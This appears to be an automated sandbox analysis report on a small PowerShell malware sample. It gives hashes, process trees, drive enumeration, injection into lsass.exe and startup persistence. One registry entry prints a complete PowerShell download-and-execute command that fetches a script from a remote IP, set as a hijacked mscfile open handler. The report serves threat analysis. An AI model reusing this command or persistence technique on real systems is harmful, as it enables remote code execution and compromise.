Analysis
-
max time kernel
149s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
24/01/2024, 12:52
Static task
static1
Behavioral task
behavioral1
Sample
one.ps1
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
one.ps1
Resource
win10v2004-20231222-en
General
-
Target
one.ps1
-
Size
339B
-
MD5
d039357ecb9f20cb86877b50ccae3c0e
-
SHA1
e35209cfc6ff1d169f06f27f09a9f3a0c8015a79
-
SHA256
31f8eac9c9a438dbcb6afb93f4204e3683af3eba6e96639d264affa1982f808c
-
SHA512
500d86437a34f834e3ebd13060736c3be74d3fde684c67eda08f032732cd2c6ed74fcab9eda1c992af99348ea7f01311fd405eab205d022e9468049a484bbc75
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 6 3800 powershell.exe 18 4360 msiexec.exe 25 4360 msiexec.exe 26 4360 msiexec.exe -
Downloads MZ/PE file
-
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompMgmtLauncher.lnk InstallSrv.exe -
Executes dropped EXE 1 IoCs
pid Process 5096 InstallSrv.exe -
Enumerates connected drives 3 TTPs 22 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 5096 set thread context of 684 5096 InstallSrv.exe 1 PID 5096 set thread context of 684 5096 InstallSrv.exe 1 PID 5096 set thread context of 684 5096 InstallSrv.exe 1 PID 5096 set thread context of 684 5096 InstallSrv.exe 1 PID 5096 set thread context of 684 5096 InstallSrv.exe 1 PID 5096 set thread context of 4360 5096 InstallSrv.exe 97 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 6 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\mscfile\Shell InstallSrv.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\mscfile\Shell\Open InstallSrv.exe Set value (str) \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\mscfile\Shell\Open\Command\ = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -c \"iex(New-Object System.Net.WebClient).DownloadString('http://27.102.132.19/one.ps1')" InstallSrv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\ColorTableU = "C:\\Users\\Admin\\InstallSrv.exe" InstallSrv.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\mscfile\Shell\Open\Command InstallSrv.exe Key created \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000_Classes\mscfile InstallSrv.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3800 powershell.exe 3800 powershell.exe 5096 InstallSrv.exe 5096 InstallSrv.exe 5096 InstallSrv.exe 5096 InstallSrv.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe 684 lsass.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 3800 powershell.exe Token: SeDebugPrivilege 5096 InstallSrv.exe Token: SeDebugPrivilege 684 lsass.exe Token: SeDebugPrivilege 2132 powershell.exe Token: SeDebugPrivilege 684 lsass.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4360 msiexec.exe -
Suspicious use of WriteProcessMemory 26 IoCs
description pid Process procid_target PID 3800 wrote to memory of 5096 3800 powershell.exe 93 PID 3800 wrote to memory of 5096 3800 powershell.exe 93 PID 5096 wrote to memory of 684 5096 InstallSrv.exe 1 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 5096 wrote to memory of 2132 5096 InstallSrv.exe 96 PID 5096 wrote to memory of 2132 5096 InstallSrv.exe 96 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 5096 wrote to memory of 4360 5096 InstallSrv.exe 97 PID 5096 wrote to memory of 4360 5096 InstallSrv.exe 97 PID 5096 wrote to memory of 4360 5096 InstallSrv.exe 97 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 684 wrote to memory of 2812 684 lsass.exe 24 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 1200 684 lsass.exe 99 PID 684 wrote to memory of 2812 684 lsass.exe 24 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:684
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2812
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\one.ps11⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3800 -
C:\Users\Admin\InstallSrv.exe"C:\Users\Admin\InstallSrv.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\SYSTEM32\msiexec.exemsiexec.exe3⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of SetWindowsHookEx
PID:4360
-
-
-
C:\Windows\System32\mousocoreworker.exeC:\Windows\System32\mousocoreworker.exe -Embedding1⤵PID:1200
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
650KB
MD58bbf3ecf48c79c584390f6a83a0b828d
SHA130a018a46b9c610435de05ce8d93aa1ec0252d61
SHA256b183a395846a2a30c8bf78b4e9dd69643c22d019e8389885412dc59ece904ec8
SHA51284d6cbea31a14fc0cf9d38476bb5705aa8269c3b0f221544eeb62c5118feb2208d63359f04067154553bd63e77a4b7f62ecaf6d2b3c2e5e5f32ae692958d22d4